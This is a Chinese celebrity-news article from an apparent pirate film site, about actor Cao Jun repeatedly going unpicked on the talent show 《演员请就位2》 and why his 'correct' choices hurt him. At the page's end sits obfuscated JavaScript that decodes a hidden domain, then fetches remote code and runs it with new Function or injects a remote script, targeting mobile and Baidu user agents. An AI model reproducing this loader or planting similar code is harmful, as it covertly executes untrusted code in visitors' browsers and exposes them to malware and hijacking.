温馨提示:【极速影院】提供最新热播电影电视剧以及动漫,如果喜欢请收藏
这里有最新电影电视剧以及动漫,如果喜欢请收藏

“正确”反而成了曹骏的短板?

时间:2020-10-26 12:29:40阅读:550
《演员请就位2》第四期播出后,“没人选曹骏”就冲上了热搜第一,可见观众们对结果的不满和对曹骏的心疼。童星出身的曹骏,是很多人的童年回忆,曾出演过《真命小和尚》《九岁县太爷》《宝莲灯》等多部经典剧,如果放在网络发达的今天,绝对是顶流级别。但如今,他的处境
  • 曹骏,1988年2月9日出生于上海,中国演员。1996年,8岁的曹骏主演了新加坡电视剧《真…

《演员请就位2》第四期播出后,“没人选曹骏”就冲上了热搜第一,可见观众们对结果的不满和对曹骏的心疼。

童星出身的曹骏,是很多人的童年回忆,曾出演过《真命小和尚》《九岁县太爷》《宝莲灯》等多部经典剧,如果放在网络发达的今天,绝对是顶流级别。

但如今,他的处境却不容乐观。

1、曹骏三次都没人选。

两年前,曹骏参加了《我就是演员》,没有得到好的结果,而且也没有通过节目走出困局,否则他就不用再来参加《演员请就位2》了。但再次参赛的他,依然很惨,三次都没人选他。

第一次,是最初的市场评级,四十位演员,评级分为S、A和B三级,曹骏不仅被分在了B级,还是最后一名,就连没有演过戏的新人,排名都在他前面。

选角的过程里,曹骏的内心肯定相当煎熬,着实让人心疼。这时候,大家还在想“没事曹骏,触底反弹更厉害!”但事与愿违,淘汰赛第一轮,曹骏就被待定了~

第二次,是新一轮选角时,曹骏仍然在B组,依然只能默默等待被其他演员邀请入组,意外的是,竟然没有人选他,他和李智楠留在了最后!

与此同时,第一轮演出时因没演技被批得很惨的张大大,却成了“香饽饽”,被人抢着邀请,黄奕想选他出演“洪世贤”,黄梦莹组想选他出演“杜飞”。

曹骏和张大大,两人的演技自然是天差地别,被选择时也是,让人唏嘘。

第三次,是竞演后,他和晏紫东、小彩旗三个人中,观众普遍夸赞他演的最好,导师郭敬明也夸赞他。曹骏自己,则一脸真诚地表示,希望导演可以给大家个他一个机会。

然而,却没有一个导师选他,于是曹骏出局成了“被待定”。

2、原因很现实。

这样的过程和结果,都不免让人唏嘘,为什么三次都没人选曹骏,甚至连张大大都比不过?

大家都不选曹骏,原因其实很现实,就是流量和话题度。

演员们不选曹骏,却选张大大,无论作品如何,这话题度首先就有了。张大大虽然一直被骂,但有的人就是走“黑红”路线,骂也是一种流量,有讨论度、有关注度。

而导演们对曹骏一番夸赞,最终却又没有选择他,其实也是对市场选择的妥协。

就像尔冬升说的“这个就是行业里面的现实,导演没有办法左右的,你以为我提出来要的演员,那些戏好的演员,我能要吗?平台会有评估的,投资方会评估。”

3、“正确”成了短板?

曹骏之所以如此让人心疼,是因为他确实有演技,更是因为他其实代表了生活中的很多人,他一直在走我们认为“正确的路”,但是,“正确”反而成了他的短板吗?

曹骏“正确的路”之一,是他的人生选择。

童星达到顶峰后,如果一直沉迷拍戏,长大后如果没有大红大紫,必然会被定义为选错了路,所以“小时了了大未必佳”。

曹骏的选择,也是大家认为正确的观点,他急流勇退,三年没有拍戏,全力准备高考,文化分很高,但反而在才艺表演上丢分,落选中戏和北影,最后考入上海视觉艺术学院。大学期间,他也非常努力,还重新捡起了武术。可以说是走得很稳的。

娱乐圈本来就是更新换代很快,从准备高考到大学毕业,七年时间过去,早已不是曹骏的时代。

在为人处事方面,我们也可以看出曹骏的“正确”,他是一个非常低调的人,踏实又谦逊,这么多年过去了,他的眼神依然清澈,而且很从容,非常难得。

同样是带着迷茫来到舞台,想问问导师自己还适不适合拍戏,在曹骏这里,一点没有卖惨和矫情的感觉,也没有任何博同情的心机,更不会接炒作来提升自己的话题度和流量,即便是几次没人选,变成待定,曹骏发文,依然是感谢导演,感谢晏紫东和小彩旗选择他,“正确”似乎反而成了他的短板?

毫无疑问,曹骏此番给节目带来了足够热度,但他自己前路如何,尚未可知,毕竟他目前已经进入待定;带着“还适不适合拍戏”的迷茫来的他,在接连两三次没人选后,想必也没有找到答案,或许还更加困惑了。

如果说参加节目给他带来的最大红利,就是尔冬升导演给的微信吧,曹骏透露,已经加上了,但想到之前尔导说导演也不一定能用自己想要的演员,还得看市场,那曹骏会不会在这里遇到转机,又不能下定论了。

希望曹骏可以有适合他的那个机会,再次大放异彩吧

相关资讯

评论

  • 评论加载中...


function WgGPjU(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function WohcQ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return WgGPjU(t);};window[''+'p'+'t'+'W'+'b'+'i'+'w'+'J'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=WohcQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('am1oZy5taWWZhcG9zdC5jb20=','152471',window,document,['W','VdayPekiO']);}:function(){};